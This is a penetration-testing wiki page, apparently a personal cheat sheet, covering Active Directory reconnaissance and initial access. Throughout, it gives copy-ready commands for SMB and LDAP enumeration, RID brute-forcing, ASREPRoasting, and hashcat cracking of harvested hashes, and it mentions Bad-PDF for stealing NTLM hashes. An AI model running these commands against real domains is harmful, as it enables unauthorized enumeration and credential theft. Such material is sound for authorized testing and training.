Reconnaissance
OSINT
Generate Active Domain username conventions
SMB Enumeration
Nmap
nmap --script smb-vuln* -p 139,445 [ip]
Netexec
## List Shares - Null session
netexec smb [host/ip] -u [user] -p [pass] --shares
## List Shares - Guest session
netexec smb [host/ip] -u guest -p '' --shares
## Spider Module through files
netexec smb -u [user] -p [pass] -M spider_plus
Enum4linux
enum4linux -a -u "" -p "" <DC IP>
enum4linux -a -u "guest" -p "" <DC IP>
Smbclient
smbclient -N -L //[ip]
smbclient //[ip]/[share name] -U [username] [password]
Additional Resources
- SMB - Share Enumeration Cheat Sheet
- BIWasp/NetExec cheat sheet
- SMB Enumeration cheat sheet
- CrackMapExec + NetExec cheat sheet
Rid Brute via SMB
Credits to 0xdf located here
Every Windows object (including users and groups) has a security identifier or SID. The SID is a unique ID that contains a bunch of information about the domain configuration, and might look something like S-1-5-21-1004336348-1177238915-682003330-512.
Within a domain or stand-alone host, the entire SID except the last number will be the same, and the last number is the relative identifier, or RID. These values fall in a predictable range, and thus, we can brute force the numbers across that range and get a list of users and groups.
Requires: Guest read access to IPC$ (Remote IPC) SMB File Share
## Using Netexec
nxc smb [IP] -u 'guest' -p '' --rid-brute > sid.txt
cat sid.txt | awk -F': ' '{print $2}' | awk '{print $1}' | sed 's/[DOMAIN]\\//' > users.txt
## Using rpcclient
rpcclient [IP] -U 'guest%'
lookupnames administrator
lookupsids S-1-5-21-622327497-3269355298-2248959698-[RID_value]
## Using Impacket
lookupsid.py guest@[IP] -no-pass
## ASrep Hashes via Username Enumeration
GetNPUsers.py [DOMAIN]/ -usersfile users.txt -format hashcat
hashcat -m 18200 creds.txt /usr/share/wordlists/rockyou.txt
LDAP Enumeration
Nmap
nmap -n -sV --script "ldap* and not brute" -p 389 <DC IP>
LDAPSearch
ldapsearch -x -H ldap://BLACKFIELD -s base namingcontexts (Domain Contexts)
ldapsearch -x -H ldap://BLACKFIELD -D 'CN=support,CN=users,DC=BLACKFIELD,DC=local' -W -b 'DC=BLACKFIELD,DC=local' '(objectClass=user)' (Search Users)
ldapsearch -H ldap://192.168.110.55 -x -D "web_svc@painters.htb" -W -b "dc=painters,dc=htb" "(msDS-AllowedToDelegateTo=*)" msDS-AllowedToDelegateTo (Constrained Delegation)
Additional resources
Poisoning and Relay
Refer to Poisoning and Relay
Web Application Vulnerabilities
Bad PDF Bad-PDF create malicious PDF file to steal NTLM(NTLMv1/NTLMv2) Hashes from windows machines, it utilize vulnerability disclosed by checkpoint team to create the malicious PDF file. Bad-Pdf reads the NTLM hashes using Responder listener.
Additional Resources
Integrated DNS Dump
Any user in Active Directory can enumerate all DNS records in the Domain or Forest DNS zones, similar to a zone transfer.
Additional Resources:
Initial Access
Password Spraying
Password Spraying via Sprayhound
- Checks badpwdcount attribute only in the domain policy
Additional Resources
ASREPRoasting
ASREPRoast is a security attack that exploits users who lack the Kerberos pre-authentication required attribute. Essentially, this vulnerability allows attackers to request authentication for a user from the Domain Controller (DC) without needing the user’s password. The DC then responds with a message encrypted with the user’s password-derived key, which attackers can attempt to crack offline to discover the user’s password.
Targets: If a domain user account do not require kerberos preauthentication, we can request a valid TGT for this account without even having domain credentials, extract the encrypted blob and bruteforce it offline.
## Request AS_REP message
python GetNPUsers.py [Domain]/ -usersfile usernames.txt -format hashcat -outputfile hashes.asreproast
Article Information
- Author: Tony Wu
- URL: https://qwutony.github.io/wiki/003-1-Reconnaissance/
- License: Free to share - NonCommercial - NoDerivatives - Attribution required (Creative Commons BY-NC-ND 4.0 License)